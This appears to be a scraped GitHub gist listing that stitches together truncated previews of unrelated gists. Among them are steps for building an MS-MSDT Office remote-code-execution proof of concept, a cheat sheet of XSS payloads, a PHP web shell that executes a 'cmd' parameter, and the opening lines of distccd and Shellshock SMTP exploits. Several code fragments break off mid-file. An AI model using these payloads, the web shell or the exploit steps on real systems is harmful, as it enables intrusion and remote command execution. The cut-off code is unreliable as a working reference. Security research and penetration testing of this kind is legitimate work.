using System;
using System.IO;
using System.Text;
using System.Threading;
using System.Diagnostics;
public class FileWatcher
{
static FileSystemWatcher watcher;
static Process p;
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Net.Sockets;
namespace tcp_client_file_write
{
internal class Program
{
@cxzero
cxzero / ms-msdt.MD
Created June 10, 2022 01:30 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@cxzero
cxzero / xss_vectors.txt
Created May 13, 2022 16:17 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@cxzero
cxzero / nmapPorts.sh
Last active June 13, 2022 16:00
Utility to extract ports from nmap grepable output
#!/bin/bash
# To be used with nmap grepable output (-oG option)
if [ -z "$1" ]; then
  echo "Usage: $(basename "$0") <grepable-nmap-input-file>"
  exit 1
fi
# Extract every port number that is preceded by whitespace and followed by "/"
# (e.g. "22/open/tcp//ssh///" in the "Ports:" field)
ports="$(grep -oP '\s\K[0-9]+(?=/)' "$1")"
# Flatten to one line and join with commas (handy for -p lists)
echo "$ports" | xargs | sed 's/ /,/g'
@cxzero
cxzero / distccd_rce_CVE-2004-2687.py
Created August 14, 2021 17:50 — forked from DarkCoderSc/distccd_rce_CVE-2004-2687.py
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
distccd v1 RCE (CVE-2004-2687)
This exploit is ported from a public Metasploit exploit code :
https://www.exploit-db.com/exploits/9915
@cxzero
cxzero / command.xml
Created July 16, 2021 13:38 — forked from georgestephanis/command.xml
How to upload a file to a WordPress site via the XML-RPC API. Pretty easy, no? The attachment page, if you want an HTML wrapper to present the file, can be found at the following URL: http://yoursite.com/?attachment_id=722 (I left the ID from the successful response in as an example)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
@cxzero
cxzero / readme.md
Last active June 1, 2021 18:37
Install Ubuntu 20.04 LTS alongside dual boot with Windows 10

Recently I have found it a little harder to set up a dual boot installation of Ubuntu 20.04 LTS / Windows 10 on a laptop. It involved:

  1. Switch SSD operation mode from RST to AHCI
  2. Prepare usb stick for Ubuntu iso image to load in UEFI mode (BIOS does not support legacy mode)
  3. Shrink Windows 10 partition
  4. Ubuntu 20.04 installation, create encrypted LVM partition
  5. Enjoy the set up

1 - Switch SSD operation mode from RST to AHCI

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@cxzero
cxzero / exploit.py
Created May 1, 2021 05:02 — forked from claudijd/exploit.py
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271